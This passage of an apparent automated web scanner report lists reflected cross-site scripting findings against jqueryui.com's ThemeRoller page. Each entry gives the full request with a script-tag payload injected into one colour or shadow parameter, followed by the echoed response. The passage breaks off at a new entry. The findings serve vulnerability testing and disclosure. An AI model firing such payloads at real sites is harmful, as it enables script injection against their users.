GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180e8f25"><script>alert(1)</script>302e12ef894&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorError" id="iconColorError" class="hex" value="ffe180e8f25\\\"><script>alert(1)</script>302e12ef894" size="6" />
...[SNIP]...

1.170. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1861a"><script>alert(1)</script>6caea56c1bd was submitted in the iconColorHeader parameter. This input was echoed as 1861a\\\"><script>alert(1)</script>6caea56c1bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a1861a"><script>alert(1)</script>6caea56c1bd&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHeader" id="iconColorHeader" class="hex" value="fadc7a1861a\\\"><script>alert(1)</script>6caea56c1bd" size="6" />
...[SNIP]...

1.171. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c128"><script>alert(1)</script>4cb1584f29a was submitted in the iconColorHighlight parameter. This input was echoed as 4c128\\\"><script>alert(1)</script>4cb1584f29a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f264c128"><script>alert(1)</script>4cb1584f29a&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHighlight" id="iconColorHighlight" class="hex" value="ed9f264c128\\\"><script>alert(1)</script>4cb1584f29a" size="6" />
...[SNIP]...

1.172. http://jqueryui.com/themeroller/_rollyourown.php [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b465"><script>alert(1)</script>c8a7d49819 was submitted in the iconColorHover parameter. This input was echoed as 3b465\\\"><script>alert(1)</script>c8a7d49819 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b003b465"><script>alert(1)</script>c8a7d49819&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39550


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorHover" id="iconColorHover" class="hex" value="bd7b003b465\\\"><script>alert(1)</script>c8a7d49819" size="6" />
...[SNIP]...

1.173. http://jqueryui.com/themeroller/_rollyourown.php [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d23"><script>alert(1)</script>365c925dcd6 was submitted in the offsetLeftShadow parameter. This input was echoed as 16d23\\\"><script>alert(1)</script>365c925dcd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px16d23"><script>alert(1)</script>365c925dcd6&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="offsetLeftShadow" id="offsetLeftShadow" class="offset" value="-7px16d23\\\"><script>alert(1)</script>365c925dcd6" />
...[SNIP]...

1.174. http://jqueryui.com/themeroller/_rollyourown.php [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c043f"><script>alert(1)</script>91a84df35aa was submitted in the offsetTopShadow parameter. This input was echoed as c043f\\\"><script>alert(1)</script>91a84df35aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7pxc043f"><script>alert(1)</script>91a84df35aa&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:56 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="offsetTopShadow" id="offsetTopShadow" class="offset" value="-7pxc043f\\\"><script>alert(1)</script>91a84df35aa" />
...[SNIP]...

1.175. http://jqueryui.com/themeroller/_rollyourown.php [opacityOverlay parameter] previous next

Summary
